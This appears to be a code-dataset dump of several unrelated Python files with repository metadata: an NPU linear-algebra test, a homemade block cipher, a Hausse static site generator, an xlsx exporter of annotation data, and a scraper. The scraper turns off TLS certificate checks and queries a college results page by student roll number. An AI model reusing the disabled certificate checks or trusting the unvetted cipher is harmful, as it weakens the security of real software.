# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import sys
import copy
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor


class TestTriangularSolve(TestCase):
    """Tests for torch.Tensor.triangular_solve on the NPU backend.

    The NPU executions and CPU/NPU comparisons are currently disabled
    (commented out); each test only exercises the CPU reference path.
    """

    def generate_data(self, min, max, shape, dtype):
        # Draw uniform random values in [min, max) and wrap them in a
        # CPU tensor of the requested dtype.
        raw = np.random.uniform(min, max, shape).astype(dtype)
        return torch.from_numpy(raw)

    def cpu_op_exec(self, input1, input2, input3, input4, input5):
        # CPU reference: solve input2 @ X = input1 with the given
        # upper/transpose/unitriangular flags.
        return input1.triangular_solve(input2,upper=input3,transpose=input4,unitriangular=input5)

    def cpu_op_exec_float16(self, input1, input2, input3, input4, input5):
        # float16 has no CPU triangular_solve kernel, so compute in float32.
        lhs = input1.to(torch.float32)
        mat = input2.to(torch.float32)
        return lhs.triangular_solve(mat,upper=input3,transpose=input4,unitriangular=input5)

    def npu_op_exec(self, input1, input2, input3, input4, input5):
        # Run the same solve on the NPU device and bring the result back.
        lhs = input1.to("npu")
        mat = input2.to("npu")
        result = lhs.triangular_solve(mat,upper=input3,transpose=input4,unitriangular=input5)
        return result.to("cpu")

    def test_triangular_solve_float32(self, device):
        # Upper-triangular solve, no transpose, not unit-triangular.
        npu_input1 = self.generate_data(0, 100, (2,3) , np.float32)
        npu_input2 = self.generate_data(0, 100, (2,2) , np.float32)
        npu_true = True
        npu_false = False
        cpu_output = self.cpu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_false)
        # NPU comparison disabled:
        #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_false)
        #self.assertRtolEqual(cpu_output, npu_output)

    def test_triangular_solve_float32_zhuanzhi(self, device):
        # "zhuanzhi" = transposed variant: solve with transpose=True.
        npu_input1 = self.generate_data(0, 100, (2,3) , np.float32)
        npu_input2 = self.generate_data(0, 100, (2,2) , np.float32)
        npu_true = True
        npu_false = False
        cpu_output = self.cpu_op_exec(npu_input1, npu_input2, npu_true, npu_true, npu_false)
        # NPU comparison disabled:
        #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_true, npu_false)
        #self.assertRtolEqual(cpu_output, npu_output)

    def test_triangular_solve_float32_danwei(self, device):
        # "danwei" = unit-triangular variant: solve with unitriangular=True.
        npu_input1 = self.generate_data(0, 100, (2,3) , np.float32)
        npu_input2 = self.generate_data(0, 100, (2,2) , np.float32)
        npu_true = True
        npu_false = False
        cpu_output = self.cpu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_true)
        # NPU comparison disabled:
        #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_true)
        #self.assertRtolEqual(cpu_output, npu_output)

    def test_triangular_solve_float16(self, device):
        # float16 path goes through the float32 CPU fallback helper.
        npu_input1 = self.generate_data(0, 100, (2,3) , np.float16)
        npu_input2 = self.generate_data(0, 100, (2,2) , np.float16)
        npu_true = True
        npu_false = False
        cpu_output = self.cpu_op_exec_float16(npu_input1, npu_input2, npu_true, npu_false, npu_true)
        # NPU comparison disabled:
        #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_true)
        #self.assertRtolEqual(cpu_output, npu_output)


instantiate_device_type_tests(TestTriangularSolve, globals(), except_for='cpu')
if __name__ == '__main__':
    torch.npu.set_device("npu:2")
    run_tests()
46.694118
101
0.705971
5f32060fe0adce3611e143101d45f84e96d9528c
7,738
py
Python
algorithm/implementation.py
xSAVIKx/SHUP-algorithm
d188add53da7ec0a163f02ea4ad49fa9f33d2402
[ "Apache-2.0" ]
null
null
null
algorithm/implementation.py
xSAVIKx/SHUP-algorithm
d188add53da7ec0a163f02ea4ad49fa9f33d2402
[ "Apache-2.0" ]
null
null
null
algorithm/implementation.py
xSAVIKx/SHUP-algorithm
d188add53da7ec0a163f02ea4ad49fa9f33d2402
[ "Apache-2.0" ]
null
null
null
from bitstring import pack, BitArray

from algorithm.util import galNI, sbox_1, sbox_2, sbox_3, sbox_4

__author__ = 'Iurii Sergiichuk <[email protected]>'

# NOTE(review): this module is Python 2 code — it relies on integer `/`
# division producing ints (used as slice bounds), str.encode('hex'), and
# __unicode__. Running it under Python 3 would require changes.


class MasterKey(object):
    """A 256-bit master key from which per-round session keys are derived."""

    def __init__(self, master_key_hex_string="0x3cc849279ba298b587a34cabaeffc5ecb3a044bbf97c516fab7ede9d1af77cfa"):
        # 256-bit key material.
        self.key = BitArray(master_key_hex_string)
        # Number of 32-bit round keys produced per cycle.
        self.session_keys_amount = 8
        # Which rotation cycle we are on; advanced by get_round_keys().
        self.current_cycle_index = 0
        # Bits the master key is rotated right per cycle.
        self.master_key_round_shift_bits = 24

    def get_round_keys(self):
        """
        Derive the session keys for the current cycle and advance the cycle.

        The master key is rotated right by 24 * current_cycle_index bits,
        then split into 8 equal 32-bit slices.

        :return: list of round keys
        :rtype: list[RoundKey]
        """
        if self.current_cycle_index:
            round_master_key = self.key.copy()
            # Stateful rotation: cycle N uses a rotation of 24*N bits.
            round_master_key.ror(self.master_key_round_shift_bits * self.current_cycle_index)
        else:
            round_master_key = self.key.copy()
        round_keys = []
        # Python 2 integer division: 256 / 8 == 32 (an int slice bound).
        round_key_size = round_master_key.length / self.session_keys_amount
        for key_index in range(0, self.session_keys_amount):
            round_key = round_master_key[key_index * round_key_size:key_index * round_key_size + round_key_size]
            round_keys.append(RoundKey(round_key))
        # NOTE(review): the counter caps at 8 then wraps to 0 on the NEXT
        # call, so the cycle sequence is 0,1,...,8,0,1,... (9 states).
        if self.current_cycle_index < 8:
            self.current_cycle_index += 1
        else:
            self.current_cycle_index = 0
        return round_keys


class RoundKey(object):
    """Thin wrapper around one 32-bit session-key BitArray."""

    def __init__(self, key):
        """
        :param key: round key
        :type key: BitArray
        """
        self.key = key

    def set_round_key(self, key):
        # Replace the stored key bits.
        self.key = key


class Message(object):
    """A message normalized to at most 256 bits, split into 8 32-bit blocks."""

    def __init__(self, message_bit_array=BitArray(length=256)):
        """
        :param message_bit_array: message BitArray
        :type message_bit_array: BitArray

        NOTE(review): the default BitArray is a mutable default argument
        shared across calls; safe only as long as no caller mutates it.
        """
        # Number of blocks the message is split into.
        self.message_block_amount = 8
        # Canonical message size in bits; longer input is trimmed.
        self.normal_message_bits_amount = 256
        self.message_bit_array = message_bit_array
        self.message = self.message_bit_array.tobytes()
        self._normalize_message()

    @classmethod
    def get_message_from_message_blocks(cls, message_blocks):
        # Reassemble a Message by concatenating the blocks' bits in order.
        message_bit_array = BitArray()
        for message_block in message_blocks:
            message_bit_array.append(message_block.message_block)
        return Message(message_bit_array)

    def set_message_as_string(self, message_string):
        # Store the raw string and its hex-encoded bit representation.
        self.message = message_string
        self.message_bit_array = BitArray(self.message_to_hex(message_string))

    def message_to_hex(self, message_string):
        # Python 2 only: str.encode('hex') hex-encodes each byte.
        return '0x' + ''.join(x.encode('hex') for x in message_string)

    def _normalize_message(self):
        # Enforce the 256-bit ceiling.
        if self.message_bit_array.length > self.normal_message_bits_amount:
            self._trim_message()

    def _trim_message(self):
        # Keep only the first 256 bits.
        self.message_bit_array = self.message_bit_array[0:self.normal_message_bits_amount]

    def get_message_blocks(self):
        """Split the message into 8 32-bit MessageBlocks, left-padding short
        input with zero bits and prepending all-zero blocks as needed."""
        message_bit_array = self.message_bit_array.copy()
        message_blocks = []
        # Python 2 integer division throughout (sizes/counts are ints).
        message_block_size = self.normal_message_bits_amount / self.message_block_amount
        padding_blocks_amount = (
                                    self.normal_message_bits_amount - message_bit_array.length) / message_block_size
        padding_bits_amount = (self.normal_message_bits_amount - message_bit_array.length) % message_block_size
        if padding_bits_amount != 0:
            # Pad the partial leading block up to a 32-bit boundary.
            padding_block = BitArray('0b' + ''.join('0' for x in range(0, padding_bits_amount)))
            message_bit_array.prepend(padding_block)
        for padding_block_index in range(0, padding_blocks_amount):
            # Whole missing blocks become 32 zero bits each.
            message_block = BitArray('0b00000000000000000000000000000000')
            message_blocks.append(MessageBlock(message_block))
        for message_block_index in range(0, self.message_block_amount - padding_blocks_amount):
            message_block = message_bit_array[
                            message_block_index * message_block_size:message_block_index * message_block_size + message_block_size]
            message_blocks.append(MessageBlock(message_block))
        return message_blocks

    def __unicode__(self):
        return self.message

    def __str__(self):
        return self.__unicode__()


class MessageBlock(object):
    """One 32-bit block of a Message."""

    def __init__(self, message_block):
        """
        :param message_block: message block
        :type message_block: BitArray
        """
        self.message_block = message_block


class Crypter(object):
    """Applies the SHUP round function repeatedly to encrypt a Message."""

    def __init__(self, master_key, message):
        """
        :param master_key: master key
        :type master_key: MasterKey
        :param message: message
        :type message: Message
        """
        self.master_key = master_key
        self.message = message
        self._crypt_message = None
        # Round counter starts at 1 and is advanced by _one_round_crypt.
        self._current_round = 1
        self._rounds_amount = 8

    def encrypt(self):
        """Run the round function until the round counter reaches
        _rounds_amount, returning the final Message."""
        self._crypt_message = self._one_round_crypt(self.message)
        while self._current_round != self._rounds_amount:
            self._crypt_message = self._one_round_crypt(self._crypt_message)
        return self._crypt_message

    def _one_round_crypt(self, message):
        """One cipher round: key-mix, chained XOR + SL transform across the
        8 blocks, then a final XOR of every block with the last block."""
        round_keys = self.master_key.get_round_keys()
        message_blocks = message.get_message_blocks()
        crypt_block_list = []
        # Key whitening: XOR each block with its round key.
        for round_key, message_block in zip(round_keys, message_blocks):
            crypt_block = round_key.key ^ message_block.message_block
            crypt_block_list.append(MessageBlock(crypt_block))
        # XOR first block with others
        for crypt_block_index in range(1, len(crypt_block_list)):
            crypt_block_list[0].message_block ^= crypt_block_list[crypt_block_index].message_block
        # make first block SL transformation
        crypt_block_list[0] = self.sl_transformation(crypt_block_list[0])
        # make SL transformation with XOR to next block (chained: each block
        # is XORed with the already-transformed previous block first).
        for crypt_block_index in range(1, len(crypt_block_list)):
            crypt_xored_with_previous_block = MessageBlock(
                crypt_block_list[crypt_block_index].message_block ^ crypt_block_list[
                    crypt_block_index - 1].message_block)
            crypt_block_list[crypt_block_index] = self.sl_transformation(crypt_xored_with_previous_block)
        # Fold the last block back into all preceding blocks.
        for crypt_block_index in range(0, len(crypt_block_list) - 1):
            crypt_block_list[crypt_block_index].message_block ^= crypt_block_list[
                len(crypt_block_list) - 1].message_block
        if self._current_round < 8:
            self._current_round += 1
        return Message.get_message_from_message_blocks(crypt_block_list)

    def sl_transformation(self, crypt_block):
        """S-box substitution of each byte followed by the MDR diffusion step.

        :param crypt_block: crypt block
        :type crypt_block: MessageBlock

        NOTE(review): `.int` yields a SIGNED byte (-128..127); negative
        values index the sbox lists from the end (Python negative indexing).
        Presumably the sboxes are built to expect this — verify.
        """
        s_0 = sbox_1[crypt_block.message_block[0:8].int]
        s_1 = sbox_2[crypt_block.message_block[8:16].int]
        s_2 = sbox_3[crypt_block.message_block[16:24].int]
        s_3 = sbox_4[crypt_block.message_block[24:32].int]
        crypt_block_result = self.mdr_transformation(pack('uint:8, uint:8, uint:8, uint:8', s_0, s_1, s_2, s_3))
        return MessageBlock(crypt_block_result)

    def mdr_transformation(self, s_block):
        """Circulant Galois-field mixing of the four bytes (MDS-style
        diffusion using the galNI lookup tables).

        :param s_block: s-block
        :type s_block: BitArray
        """
        mdr_0 = s_block[0:8].int
        mdr_1 = s_block[8:16].int
        mdr_2 = s_block[16:24].int
        mdr_3 = s_block[24:32].int
        g0, g1, g2, g3 = galNI
        # Each output byte mixes all four inputs; the g-table assignment is
        # rotated one step per row (circulant matrix multiply over GF(2^8)).
        result_0 = g0[mdr_0] ^ g1[mdr_1] ^ g2[mdr_2] ^ g3[mdr_3]
        result_1 = g3[mdr_0] ^ g0[mdr_1] ^ g1[mdr_2] ^ g2[mdr_3]
        result_2 = g2[mdr_0] ^ g3[mdr_1] ^ g0[mdr_2] ^ g1[mdr_3]
        result_3 = g1[mdr_0] ^ g2[mdr_1] ^ g3[mdr_2] ^ g0[mdr_3]
        return pack('uint:8, uint:8, uint:8, uint:8', result_0, result_1, result_2, result_3)
37.931373
131
0.667873
263fcc0769a3c20cdf737d2d68c3e4cbb758029b
1,016
py
Python
python/advanced_sw/GITHUB/test2.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
16
2018-11-26T08:39:42.000Z
2019-05-08T10:09:52.000Z
python/advanced_sw/GITHUB/test2.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
8
2020-05-04T06:29:26.000Z
2022-02-12T05:33:16.000Z
python/advanced_sw/GITHUB/test2.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
5
2020-02-11T16:02:21.000Z
2021-02-05T07:48:30.000Z
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
import re
import sqlite3
import requests
import datetime
import os
import sys
import argparse
import random
import lxml
import lxml.html as lh
from lxml import etree
import wget
from io import StringIO, BytesIO
from urllib.request import Request, urlopen

# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def gender_genie():
    """POST the CIA-marks lookup form and return the parsed HTML tree."""
    url = 'http://www.sxceducation.net/BABSC_CIA/CIAMARKS.aspx'
    payload = {
        'ddlSession': '2017-2018',
        'ddlSemester': 'Sem - IV',
        'ddlStream': 'BSC',
        'ddlDept': 'COMPUTER SCIENCE HONOURS',
        'txtRoll': '508',
        'submit': 'btnViewCIA',
    }
    resp = requests.post(url, data=payload)
    # Parse the response body into an lxml document for inspection.
    return lh.document_fromstring(resp.content)


if __name__ == '__main__':
    document = gender_genie()
    print(lxml.html.tostring(document))
23.090909
63
0.697835
f8c07f61de0f629904e117299d2bfb944d21da47
8,756
py
Python
hausse/hausse.py
andrenasturas/hausse
58e7cb71d5105cf1d6ec7d294e85668855bf8336
[ "MIT" ]
null
null
null
hausse/hausse.py
andrenasturas/hausse
58e7cb71d5105cf1d6ec7d294e85668855bf8336
[ "MIT" ]
1
2021-08-30T21:41:46.000Z
2021-08-30T21:41:46.000Z
hausse/hausse.py
andrenasturas/hausse
58e7cb71d5105cf1d6ec7d294e85668855bf8336
[ "MIT" ]
1
2021-08-31T19:27:32.000Z
2021-08-31T19:27:32.000Z
"""Hausse main module."""

import json
import logging
import os
from importlib import import_module
from pathlib import Path
from typing import Callable, Iterable, Union

import yaml

from .lib import Element, Project
from .utils import Defaults, Keys, clean_dir


class Hausse(Project):
    """
    Hausse
    ======

    A pluggable static project generator.

    Hausse can build a static project using a customized list of plugins. A
    Hausse object should be initialized, populated by initialized plugins with
    `use()` method, then executed with the `build()` method.

    Note that without any plugins, Hausse will do no more thant copying files
    from the source directory (`src` by default) to the output directory
    (`dist` by default). All processing is done by the plugins.

    Note also that all Hausse's method returns `self`, for convenient methods
    call chaining.

    Hausse object represents at any time the state of the project just before
    the copy to the output directory. Besides the plugins, it contains a list
    of processed files, global metadata usable by plugins and settings data
    used by some plugins relying on previous plugins work. This part is
    inherited from `hausse.lib.Project` parent class.

    Parameters
    ----------
    base : str
        Working directory or hausse.json file path. Current folder by default.
        If None and hausse.json available in current folder, it will be used.
    elements : List of Element
        Additional elements to be add to the project
    metadata : dict
        Additional metadata to be add to the project
    settings : dict
        Additional settings to be add to the project
    **kwargs : dict
        Additional settings to be add to the project. Overwrite `settings`.

    Examples
    --------
    >>> Hausse().build() # Copy the content of `./src` to `./dist`
    >>> Hausse().use(Markdown()).build() # Parses markdown files from `./src` to HTML files in `./dist`.
    >>> Hausse("website").use(Markdown()).build() # Same as before, but using `./website/src` and `./website/dist`
    >>> Hausse("website", metadata={"foo": "bar"}).use(Markdown()).build() # Same as before, but with "foo" metadata accessible everywhere.

    Attributes
    ----------
    _plugins : List of Plugin
        Registered plugins that will be called in `build()` method.
    elements : List of Element
        Elements (files, mainly) loaded from source to be processed.
    metadata : dict
        Global metadata accessible from any Element.
    settings : dict
        Technical storage dictionary for plugins interactions.

    .. note:: Via inherited `Project.__getattr__` method, `metadata` content
        is also accessible as `Hausse` attributes for convenient usage.
    """

    def __init__(
        self,
        base_dir: str = None,
        elements: list[Element] = None,
        metadata: dict = None,
        settings: dict = None,
        **kwargs,
    ):

        # Project init
        super().__init__(elements, metadata, settings, **kwargs)

        # Loaded plugins list
        self._plugins: list[Callable] = list()

        # Base directory: if a file path was given, use its parent folder.
        base_path = Path(base_dir) if base_dir else Path(Defaults.BASE)
        self.settings[Keys.BASE] = (
            base_path.parent if base_path.is_file() else base_path
        )

    def source(self, src: str = Defaults.SRC):
        """Set the source files directory path. *Defaults to `src`*."""
        self.settings[Keys.SRC] = Path(src or Defaults.SRC)
        return self

    def destination(self, dist: str = Defaults.DIST):
        """Set the output directory path. *Defaults to `dist`*."""
        self.settings[Keys.DIST] = Path(dist or Defaults.DIST)
        return self

    def clean(self, clean: bool = Defaults.CLEAN):
        """Toggle output directory cleaning. False by default."""
        self.settings[Keys.CLEAN] = Defaults.CLEAN if clean is None else clean
        return self

    def use(self, plugin: Union[Iterable[Callable], Callable]):
        """Register a plugin or a list of plugins.

        Each plugin have to be registered into the Hausse project via this
        method. Plugins are stored and used in order. A plugin can be used
        multiple time at once if relevent.

        Note
        ----
        This method actually accepts any callables, not only Plugin objects,
        in order to allow usage of simple custom-made methods without full
        Plugin implementation.
        """

        if isinstance(plugin, list):
            self._plugins += plugin
        elif callable(plugin):
            self._plugins.append(plugin)
        else:
            raise ValueError(f"{type(plugin)} is not callable nor an iterable")

        return self

    def build(self):
        """Build the project."""

        # Saving original working directory
        owd = os.getcwd()

        # Set working directory
        os.chdir(self.settings.get(Keys.BASE, Defaults.BASE))

        # Cleaning dist directory
        if self.settings.get(Keys.CLEAN, Defaults.CLEAN):
            clean_dir(self.settings.get(Keys.DIST, Defaults.DIST))

        # Load all source files if source folder is defined
        src = self.settings.get(Keys.SRC)
        if src:
            self.elements += [
                Element(p.relative_to(src), src, self.metadata)
                for p in src.rglob("*")
                if p.is_file()
            ]

        # Apply all plugins work
        for plugin in self._plugins:
            plugin(self)

        # Saving built files
        dist = self.settings.get(Keys.DIST)
        if dist:
            for document in self.elements:

                # Arborescence creation
                document_path = Path(os.path.join(dist, document._path))
                document_path.parent.mkdir(parents=True, exist_ok=True)

                # Saving built file
                with open(os.path.join(dist, document._path), "w") as file:
                    file.write(str(document))

        # Restoring original working directory
        os.chdir(owd)

        return self

    def save(self, file=None, mode=None, hidden: bool = False):
        """Save the current configuration to a file.

        Parameters
        ----------
        file : str, optional
            Target file name; first entry of `Defaults.FILES` by default.
        mode : str, optional
            "json" or "yaml"; inferred from the file extension when omitted.
        hidden : bool
            Prefix the file name with a dot.
        """
        if file is None:
            file = Defaults.FILES[0]
        if hidden and not file.startswith("."):
            file = "." + file
        file = Path(self.settings[Keys.BASE] / Path(file))
        if not mode:
            # BUG FIX: pathlib.Path has no `.ext` attribute (it raised
            # AttributeError here); `.suffix` includes the leading dot.
            mode = "yaml" if file.suffix in (".yml", ".yaml") else "json"

        settings = dict()
        # Only persist values that differ from the defaults. Use .get() so an
        # unset key does not raise KeyError (SRC/DIST/CLEAN are only present
        # if source()/destination()/clean() were called).
        if str(self.settings.get(Keys.SRC, Defaults.SRC)) != Defaults.SRC:
            settings[Keys.SRC] = str(self.settings[Keys.SRC])
        if str(self.settings.get(Keys.DIST, Defaults.DIST)) != Defaults.DIST:
            settings[Keys.DIST] = str(self.settings[Keys.DIST])
        if self.settings.get(Keys.CLEAN, Defaults.CLEAN) != Defaults.CLEAN:
            settings[Keys.CLEAN] = str(self.settings[Keys.CLEAN])

        # NOTE(review): assumes every registered plugin exposes a `save()`
        # method; plain callables registered via use() would fail here.
        settings[Keys.PLUGINS] = {
            plugin.__class__.__name__: plugin.save() for plugin in self._plugins
        }

        with open(file, "w", encoding="utf-8") as f:
            if mode == "json":
                json.dump(settings, f, ensure_ascii=False, indent=4)
            if mode in ["yaml", "yml"]:
                yaml.dump(settings, f, allow_unicode=True)

    def load(self, file=None, mode=None):
        """Loads a `hausse.json` settings file"""
        if file is None:
            for default in Defaults.FILES:
                if (self.settings[Keys.BASE] / Path(default)).exists():
                    file = self.settings[Keys.BASE] / Path(default)
                    break
            # BUG FIX: previously Path(None) raised TypeError when no default
            # settings file existed; bail out gracefully instead.
            if file is None:
                logging.warning("No settings file found to load.")
                return self
        file = Path(file)

        try:
            with open(file) as settings:
                if mode == "json" or not mode and file.suffix == ".json":
                    settings = json.load(settings)
                elif (
                    mode == "yaml"
                    or mode == "yml"
                    or not mode
                    and file.suffix in [".yml", ".yaml"]
                ):
                    # safe_load: settings files should not instantiate
                    # arbitrary Python objects (yaml.load without a Loader is
                    # unsafe and rejected by modern PyYAML).
                    settings = yaml.safe_load(settings)

            self.source(settings.get(Keys.SRC))
            self.destination(settings.get(Keys.DIST))
            self.clean(settings.get(Keys.CLEAN))

            plugins = import_module("hausse.plugins")
            for name, kwargs in settings.get("plugins", []).items():
                plugin = getattr(plugins, name)
                if plugin:
                    self.use(plugin(**kwargs))
        except Exception as error:
            # Best-effort load: keep going with defaults, but say why.
            logging.warning(f"Failed to load {file} settings file: {error}")

        return self

    # Aliases
    src = source
    dist = destination
    dest = destination
32.917293
80
0.592051
e4b5e6e05339b587ceb4e6a6d8384c8ad3b8aba6
866
py
Python
create_game.py
Lyniat/dungeon-hop
e8d19b2c933feb6665935f37f73785626698ea09
[ "MIT" ]
null
null
null
create_game.py
Lyniat/dungeon-hop
e8d19b2c933feb6665935f37f73785626698ea09
[ "MIT" ]
null
null
null
create_game.py
Lyniat/dungeon-hop
e8d19b2c933feb6665935f37f73785626698ea09
[ "MIT" ]
null
null
null
import time
import re
import os

# Stamps a fresh timestamp-based GAME_VERSION into the client and server
# sources, then runs the obfuscation step. (Python 2 script; print with a
# single parenthesized argument behaves identically on 2 and 3.)

version = time.time()
print("actual version will be: " + str(version))


def update_game_version(path, version):
    # Rewrite every `GAME_VERSION ... ,` assignment in `path` with the new
    # version number. The file is read fully before being rewritten, and the
    # `with` blocks close the handles (the old explicit close() calls after
    # `with` were redundant).
    lines = []
    with open(path) as infile:
        for line in infile:
            lines.append(re.sub('GAME_VERSION.*,', 'GAME_VERSION = ' + str(version) + ',', line))
    print("new content will be: " + str(lines))
    with open(path, 'w') as outfile:
        for line in lines:
            outfile.write(line)


# Same substitution applied to both the client and the server copy so their
# version constants stay in sync.
update_game_version('./main/client/GameInstance.js', version)
update_game_version('./server/server.js', version)

os.system('sh ./obfuscate.sh')
21.65
73
0.655889
39afa0f3a2092298267dda406d5fa7530089896a
11,026
py
Python
backend/app/core/export/task_exporter.py
jinnn-dev/patholearn
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
[ "MIT" ]
1
2022-02-20T12:45:04.000Z
2022-02-20T12:45:04.000Z
backend/app/core/export/task_exporter.py
JamesNeumann/learning-by-annotations
c2b5e4b653eeb1c973aa5a7dad35ac8be18cb1ad
[ "MIT" ]
21
2021-11-01T10:13:56.000Z
2021-12-02T10:02:13.000Z
backend/app/core/export/task_exporter.py
jinnn-dev/patholearn
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
[ "MIT" ]
1
2021-12-16T18:20:55.000Z
2021-12-16T18:20:55.000Z
import re from io import BytesIO from typing import List, Tuple, Type import requests import xlsxwriter from app.core.config import settings from app.crud.crud_base_task import crud_base_task from app.crud.crud_task_group import crud_task_group from app.crud.crud_user import crud_user from app.crud.crud_user_solution import crud_user_solution from app.models.task import Task from app.schemas.base_task import BaseTask, BaseTaskDetail from app.schemas.polygon_data import AnnotationData, AnnotationType from app.schemas.task import TaskType from app.schemas.task_group import TaskGroup from app.schemas.user import User from app.schemas.user_solution import UserSolution from pydantic import BaseModel, parse_obj_as from sqlalchemy.orm import Session from xlsxwriter import Workbook from xlsxwriter.worksheet import Worksheet class TaskPointRow(BaseModel): user_id: int first_name: str middle_name: str last_name: str x: float y: float label: str question: str task_name: str task_group_name: str image: str class TaskExporter: @staticmethod def write_xlsx_header(worksheet: Worksheet, model: Type[BaseModel]) -> None: """ Writes all fields in the given model to the worksheet first row :param worksheet: Worksheet to write to :param model: Model which field represent the column names """ char = "A" for index, field in enumerate(model.__fields__): col = chr(ord(char[0]) + index) + "1" worksheet.write(col, field) @staticmethod def export_point_task_group_as_xlsx(db: Session, task_group: TaskGroup) -> BytesIO: """ Creates worksheet of point user solutions to the given task group :param db: DB-Session :param task_group: The task group to export the points from :return: Bytes representation of the worksheet """ workbook, worksheet, output = TaskExporter.initialize_xlsx_file() TaskExporter.write_xlsx_header(worksheet, TaskPointRow) start_row = 2 for base_task in task_group.tasks: try: image = requests.get( settings.SLIDE_URL + "/slides/" + base_task.slide_id + "/name" ).json()["name"] 
except Exception as e: print(e) image = {"name": "Not Found"} start_row = TaskExporter.write_rows_for_base_task( db, worksheet, base_task, task_group, image, start_row ) workbook.close() output.seek(0) return output @staticmethod def export_point_base_task_as_xlsx( db: Session, base_task: BaseTaskDetail, task_group=None ) -> BytesIO: """ Creates worksheet of point user solutions to the given base task :param db: DB-Session :param base_task: The base task to export the points from :param task_group: The task group of the base task :return: Bytes representation of the worksheet """ if not task_group: task_group = crud_task_group.get(db, id=base_task.task_group_id) workbook, worksheet, output = TaskExporter.initialize_xlsx_file() try: image = requests.get( settings.SLIDE_URL + "/slides/" + base_task.slide_id + "/name" ).json()["name"] except Exception as e: print(e) image = {"name": "Not Found"} TaskExporter.write_xlsx_header(worksheet, TaskPointRow) start_row = 2 for task in base_task.tasks: user_solutions = crud_user_solution.get_solution_to_task( db, task_id=task.id ) start_row += TaskExporter.write_rows_for_task( db, worksheet, user_solutions, task, base_task, task_group, image, start_row, ) workbook.close() output.seek(0) return output @staticmethod def export_point_task_as_xlsx( db: Session, task: Task, base_task: BaseTask = None, task_group: TaskGroup = None, ) -> BytesIO: """ Creates worksheet of point user solutions to the given task :param db: DB-Session :param task: The task to export the points from :param base_task: The base task of the task :param task_group: The task group of the task :return: Bytes representation of the worksheet """ if not base_task: base_task = crud_base_task.get(db, id=task.base_task_id) if not task_group: task_group = crud_task_group.get(db, id=base_task.task_group_id) try: image = requests.get( settings.SLIDE_URL + "/slides/" + base_task.slide_id + "/name" ).json()["name"] except Exception as e: print(e) image = {"name": "Not 
Found"} user_solutions = crud_user_solution.get_solution_to_task(db, task_id=task.id) workbook, worksheet, output = TaskExporter.initialize_xlsx_file() TaskExporter.write_xlsx_header(worksheet, TaskPointRow) TaskExporter.write_rows_for_task( db, worksheet, user_solutions, task, base_task, task_group, image, start_row=2, ) workbook.close() output.seek(0) return output @staticmethod def write_rows_for_task( db: Session, worksheet: Worksheet, user_solutions: List[UserSolution], task: Task, base_task: BaseTask, task_group: TaskGroup, image: str, start_row: int, ) -> int: """ Writes one row for each user solution :param db: DB-Session :param worksheet: Worksheet to write to :param user_solutions: User solutions to extract data from :param task: The task of the user solutions :param base_task: The base task of the user solutions :param task_group: The task group of the user solutions :param image: Image path of the task :param start_row: Where to start writing :return: The last row written to """ char = "A" row_num = 0 for user_solution in user_solutions: user = crud_user.get(db, id=user_solution.user_id) user_solution_rows = TaskExporter.get_point_row( user_solution, user, task, base_task, task_group, image ) for index, row in enumerate(user_solution_rows): for col_index, item in enumerate(TaskPointRow.__fields__): json_row = row.dict() worksheet.write( chr(ord(char[0]) + col_index) + str(start_row + row_num), json_row[item], ) row_num += 1 return row_num @staticmethod def write_rows_for_base_task( db: Session, worksheet: Worksheet, base_task: BaseTaskDetail, task_group: TaskGroup, image: str, start_row: int, ) -> int: """ Writes rows for each task in base task :param db: DB-Session :param worksheet: The worksheet to write to :param base_task: The base task to extract data from :param task_group: The task group of the base task :param image: The image of the base task :param start_row: Where to start writing :return: The last row written to """ for task in 
base_task.tasks: user_solutions = crud_user_solution.get_solution_to_task( db, task_id=task.id ) start_row += TaskExporter.write_rows_for_task( db, worksheet, user_solutions, task, base_task, task_group, image, start_row, ) return start_row @staticmethod def get_point_row( user_solution: UserSolution, user: User, task: Task, base_task: BaseTask, task_group: TaskGroup, image: str, ) -> List[TaskPointRow]: """ Converts each annotation of the given user solution to an object representing a row in the worksheet :param user_solution: User solution that should be converted :param user: User of the user solution :param task: Task of the user solution :param base_task: Base task of the user solution :param task_group: Task group of the user solution :param image: Image of the base task :return: All Row objects """ task_point_rows = [] if ( task.annotation_type == AnnotationType.SOLUTION_POINT and task.task_type != TaskType.IMAGE_SELECT ): parsed_data = parse_obj_as( List[AnnotationData], user_solution.solution_data ) for annotation in parsed_data: label = annotation.name if not annotation.name: found_bracket_text = re.findall("\((.*?)\)", task.task_question) if len(found_bracket_text) > 0: label = found_bracket_text[0] else: label = "" task_point_rows.append( TaskPointRow( user_id=user.id, first_name=user.firstname, middle_name=user.middlename or "", last_name=user.lastname, x=annotation.coord.image[0].x, y=annotation.coord.image[0].y, label=label, question=task.task_question, task_name=base_task.name, task_group_name=task_group.name, image=image, ) ) return task_point_rows @staticmethod def initialize_xlsx_file() -> Tuple[Workbook, Worksheet, BytesIO]: """ Initializes a xlsx workbook, worksheet and Bytes Buffer :return: Initialized workbook, worksheet and bytes buffer """ output = BytesIO() workbook = xlsxwriter.Workbook(output) worksheet = workbook.add_worksheet() return workbook, worksheet, output
33.718654
109
0.565844
